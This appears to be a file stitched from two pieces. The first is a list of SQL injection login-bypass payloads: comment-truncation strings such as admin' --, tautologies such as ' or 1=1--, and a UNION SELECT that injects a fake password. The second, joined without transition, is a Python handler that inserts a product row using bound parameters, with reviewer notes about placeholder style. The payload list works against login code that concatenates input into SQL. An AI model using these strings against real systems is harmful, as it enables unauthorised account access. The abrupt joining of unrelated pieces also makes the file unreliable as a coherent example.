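# Login bypass when the password is compared inside the SQL query (applies only where the username is concatenated into the SQL text; bound parameters make these strings plain data)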
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
# Login bypass when the password is compared in application code
admin' AND 1=0 UNION ALL SELECT 'fakepassword'--
import json
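def view(self, request):
    """Insert one product row built from the JSON body of *request*.

    ``request.post`` is parsed as JSON and must provide the keys ``id``,
    ``name``, ``price`` and ``stock``. The four values are passed to the
    driver as bound parameters rather than formatted into the SQL text, so
    quotes or SQL syntax inside a field are stored as data and cannot alter
    the statement.

    Raises:
        ValueError: if the body is not valid JSON (``json.JSONDecodeError``
            is a subclass of ``ValueError``).
        KeyError: if one of the four expected keys is missing.
    """
    # Everything in this dict is client-controlled and must be treated as
    # untrusted. Named ``payload`` to avoid shadowing the builtin ``input``.
    payload = json.loads(request.post)

    # NOTE(review): ``%s`` placeholders assume a DB-API driver that uses the
    # "format"/"pyformat" paramstyle; a "qmark" driver needs ``?`` instead.
    # ``cur`` is defined outside this block, presumably a DB-API cursor.
    # TODO confirm both against the driver in use.
    result = cur.execute(
        "INSERT INTO products (id, name, price, stock) VALUES (%s, %s, %s, %s)",
        (payload["id"], payload["name"], payload["price"], payload["stock"]),
    )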